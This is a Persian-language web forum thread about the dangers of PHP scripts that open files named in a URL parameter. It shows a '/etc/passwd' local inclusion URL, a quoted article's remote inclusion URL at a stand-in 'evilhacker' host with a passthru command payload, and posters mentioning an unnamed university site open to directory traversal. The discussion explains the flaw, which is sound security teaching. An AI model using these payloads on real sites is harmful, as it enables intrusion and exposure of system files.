چرا می گن باز کردن فایل ها بوسیله متغییر خطرناکه؟(مرور فایل های رو وب سرور را کنار بگذاریم)
مثلا ممکن است چیزی مثل این داشته باشیم
www.example.com/file.php?file=thefile
اگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
(چنکه تنها می تونه فایل های خارجی را باز کنه مثلا یاهوو رو ببینه)

چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می شه، مثلا:
www.example.com/file.php?file=/etc/passwd
این خط می تونه فایل پسورد های لینوکس رو در بیاره و نشون بده یا ....

به هر حال، از چندین راه می شه جلوی این عملیات رو گرفت. اما اگه یادت باشه، من گفتم اگر بد برنامه نویسی بشه. (چیزی شبیه register_globals در PHP که ذاتا هیچ خطری نداره ولی کافیه شرایط مساعد باشه و برنامه نویس کمی گاگول. البته خطر register_globals از این مشکلی که شما مطرح کردید به مراتب کمتره)

اگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
گفتم جز این

چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می ش

من مشکل دیگه ای به ذهنم نمی رسه.

In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

http://example.com/page.php?i=http://evilhacker.org/exec.html

Where exec.html contains a couple of lines of code:

<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
http://www.zend.com/zend/art/art-oertli.php
منظورم چیزی که در قسمت مربوطه در این مقاله گفته شده هر چی فکر می کنم می بینم باز شدن یک فایل خارجی نباید تاثیری داشته باشه

نگاه کن، شاید اینطور روش های هک (دسترسی به سرور) رو بشه به دو دستهء راه دور و محلی تقسیم کرد.
اگر دسترسی محلی با زبونی مثل PHP ممکن باشه، با این روشی که شما می گی هم می شه به سرور دسترسی پیدا کرد (البته قطعا باید این فایل رو سرور نصب باشه) این یعنی همون امنیت پایین که خودتون هم گفتید.
در غیر این صورت مشکلی نیست :) و سر جناب هکر به سنگ می خوره.

موفق باشید، امید

سایت یکی از دانشگاه ها که با پی اچ پی نوشته شده به علت چک نکردن متغییر های ارسالی دچار همین مشکل هستش و میتوان با چند تا /../../.. به عقب و یک /etc/passwd به یه جاهای خوبی رسید و ...

سایت یکی از دانشگاه ها که با پی اچ پی نوشته شده به علت چک نکردن متغییر های ارسالی دچار همین مشکل هستش و میتوان با چند تا /../../.. به عقب و یک /etc/passwd به یه جاهای خوبی رسید و ...
هه هه هه، با شناختی که ازت دارم، فکر می کنم بدونم کدوم دانشگاه رو می گی :)

نچ (:D) یکی از دانشگاه های طرف های خودمونه اما نه اون یکی که تو فکر میکنی :P (دانشگاه آزاد نیستش)
اون ها اومدن یک صفحه اصلی طراحی کردن و با پاس دادن دو متغییر یکی برای صفحه اصلی و دیگری برای منوی سمت چپشون که توی این صفحه اصلی میاد و این دو تا فایل و که به عنوان پارامتر پاس میده باز میکنه و ...
و جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده

و جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده
در میخانه را بگشا که ار خانقه نگشود********** گرت باور بود یا نه سخن این بود و ما گفتیم
حالا کسی چیز دیگه ای به نظرش نمی رسه؟